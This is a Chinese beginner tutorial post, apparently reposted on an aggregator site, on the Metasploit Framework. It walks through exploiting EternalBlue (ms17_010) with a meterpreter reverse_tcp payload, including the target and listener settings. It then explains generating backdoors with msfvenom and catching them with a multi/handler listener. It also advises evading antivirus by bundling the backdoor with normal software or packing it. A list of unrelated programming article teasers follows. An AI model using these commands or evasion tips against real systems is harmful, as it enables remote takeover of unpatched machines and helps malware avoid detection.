【网络安全】-入门版

secure

  • 一、基本工具
    • 1、metasploit framework

ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。

一、基本工具

1、metasploit framework

msf(metasploit framework)是一个开源的渗透测试框架,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具漏洞利用模块负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。

msf使用法则:使用模块->配置模块必选项->运行模块

msfconsole		//进入msf控制台,以使用模块(推荐root权限)
>>>进入msf//1、使用模块
search 关键词	//搜索模块
use 模块编号/绝对路径	//使用模块
>>>进入模块
//2、配置模块必选项
show options	//显示配置选项
set 选项名称 值
//3、运行模块
run

举例:metasploit攻击永恒之蓝(后门)
1、有此漏洞的目标主机

//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址]
set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help	//从帮助里看看能对目标主机干什么

2、无此漏洞的目标主机(常用)
没有漏洞就得拍个间谍过去,把后门打开。

2.1 目标主机的间谍软件:msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线,更容易策反meterpreter,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]
在这里插入图片描述
避开杀毒软件
方法一:和正常软件捆绑
在这里插入图片描述
方法二:给辅助软件加壳
自行寻找

2.2 本地主机的接应程序:

use exploit/multi/handler	//攻击多目标载荷模块
set payload windows/x64/meterpreter/reverse_tcp//设置载荷
set thost 192.168.1.136
set lport 9999
run

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/637318.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

小程序系列--10.小程序WXS 脚本

一、概述 1. 什么是 wxs? WXS(WeiXin Script)是小程序独有的一套脚本语言,结合 WXML,可以构建出页面的结构。 2. wxs 的应用场景 wxml 中无法调用在页面的 .js 中定义的函数,但是,wxml 中可…

Vagrant安装Oracle Data Guard环境示例

在Windows 11下,通过Vagrant安装标准的Data Guard环境(默认为non-CDB模式),耗时约26分钟,共生成2台虚机。以下为安装日志: ...host2: Welcome to DGMGRL, type "help" for information.host2: C…

《Python数据分析实战》

环境搭建 定义变量名时要遵循的规则: 变量名必须以字母或下画线开始,名字中间只能由字母、数字和下画线组成长度不能超过255个字符变量名在有效范围内必须具有唯一性不能使用保留字(关键字)区分大小写 不能对元组中的元素做修改…

分布式锁注解SyncLock

一、目标: 1、简化手动开关锁的重复代码(专注业务本身) 2、集成不同分布式锁解决方案(锁不同使用方式不同) 3、规范锁的命名和异常信息内容(内容不规范,不易于理解和维护) 4、避免事…

pyspark笔记:over

1 方法介绍 在 PySpark 中,over 函数是一个非常重要的概念,尤其是在使用窗口函数(例如 row_number, rank, dense_rank, lead, lag 等)时。over 函数允许你对一个数据集进行分组,然后在每个分组内应用窗口函数。 1.1 …

Appium 环境配置

Appium 是一个开源的、跨平台的测试框架,可以用来测试 Native App、混合应用、移动 Web 应用(H5 应用)等,也是当下互联网企业实现移动自动化测试的重要工具。Appium 坚持的测试理念: •无需用户对 App 进行任何修改或…

2024年一整年的考试报名时间表不许再错过考试啦

每个大学生都不能错过的超全考试报名表! 有了它谁还会再错过考试哇!!! 1月报名 专转本考试 12月底-1月报名 卫生资格考试 1月中旬报名 教师资格证笔试 1月报名 各省省考 2月报名 医师资格考试 2月报名 初级高级会计 2月报名 计算机…

Java 基础 - Java 多态性详解与实例解析

Java 多态性详解与实例解析 多态性是面向对象编程中的一个重要概念,它允许不同类型的对象以相同的方式对待,从而提高了代码的灵活性和可维护性。在 Java 中,多态性通过继承和方法重写实现,让我们深入了解一下。 什么是多态性? 多态性是指在同一类型的变量调用相同方法时…

架构篇05-复杂度来源:高可用

文章目录 计算高可用存储高可用高可用状态决策小结 今天,我们聊聊复杂度的第二个来源高可用。 参考维基百科,先来看看高可用的定义。 系统无中断地执行其功能的能力,代表系统的可用性程度,是进行系统设计时的准则之一。 这个定义…

快速入门:使用 Gemini Embeddings 和 Elasticsearch 进行向量搜索

Gemini 是 Google DeepMind 开发的多模态大语言模型家族,作为 LaMDA 和 PaLM 2 的后继者。由 Gemini Ultra、Gemini Pro 和 Gemini Nano 组成,于 2023 年 12 月 6 日发布,定位为 OpenAI 的竞争者 GPT-4。 本教程演示如何使用 Gemini API 创建…

【代码整理】基于COCO格式的pytorch Dataset类实现

import模块 import numpy as np import torch from functools import partial from PIL import Image from torch.utils.data.dataset import Dataset from torch.utils.data import DataLoader import random import albumentations as A from pycocotools.coco import COCO …

java SSM园林绿化管理系统myeclipse开发mysql数据库springMVC模式java编程计算机网页设计

一、源码特点 java SSM园林绿化管理系统是一套完善的web设计系统(系统采用SSM框架进行设计开发,springspringMVCmybatis),对理解JSP java编程开发语言有帮助,系统具有完整的源代 码和数据库,系统主要采…

网易真的大规模裁员吗?

关注卢松松,会经常给你分享一些我的经验和观点。 以前互联网公司裁员,大家不紧张,因为容易找工作,而现在不知道怎么回事,只要以提高某某公司裁员,这就能迅速登上热榜。 这不,最近网传网易裁员1…

二、项目开发计划模板

1.引言 1.1编写目的 1.2项目背景 1.3定义 1.4参考资料 2.项目概述 2.1工作内容 2.2条件与限制 2.3产品 2.4运行环境 2.5服务 2.6验收标准 3.实施计划 3.1任务分解 3.2进度 3.3预算 3.4关键问题 4&#xff…

Linux的IO文件操作和文件系统

前要:本次我想给您带来关于 IO 和文件的知识,而文件在本系列中分为内存上的文件和磁盘上的文件。 1.文件概念 1.1.文件读写 在谈及系统接口之前,我们先来从 C 语言的角度来谈及一些前要知识,以辅助我们后续来理解系统 IO。 我们…

大数据导论(3)---大数据技术

文章目录 1. 大数据技术概述2. 数据采集与预处理2.1 数据采集2.2 预处理 3. 数据存储和管理3.1 分布式基础架构Hadoop3.2 分布式文件系统HDFS3.3 分布式数据库HBase3.4 非关系型数据库NoSQL 4. 数据可视化与保护 1. 大数据技术概述 大数据技术主要包括数据采集与预处理、数据存…

关于常见分布式组件高可用设计原理的理解和思考

文章目录 1. 数据存储场景和存储策略1.1 镜像模式-小规模数据1.2 分片模式-大规模数据 2. 数据一致性和高可用问题2.1 镜像模式如何保证数据一致性2.2 镜像模式如何保证数据高可用2.2.1 HA模式2.2.2 分布式选主模式 2.3 分片模式如何数据一致性和高可用 3. 大规模数据集群的架构…

32 登录页组件

效果演示 实现了一个登录页面的样式,包括一个容器、左侧和右侧部分。左侧部分是一个背景图片,右侧部分是一个表单,包括输入框、复选框、按钮和忘记密码链接。整个页面的背景色为白色,容器为一个圆角矩形,表单为一个半透…

linux C语言socket函数send

在Linux中,使用C语言进行网络编程时,send函数是用于发送数据到已连接的套接字的重要函数之一。它通常用于TCP连接,但也可以用于UDP(尽管对于UDP,通常更推荐使用sendto,因为它允许你指定目标地址和端口&…

建议数据库设计的必选字段

在数据库设计时,建议以下13个字段设置为数据库必要字段,以保证数据的完整和连续。(参考阿里开发规范,结合业务特点) id(id) id 是否删除(if_delete) 用于表达该记录是…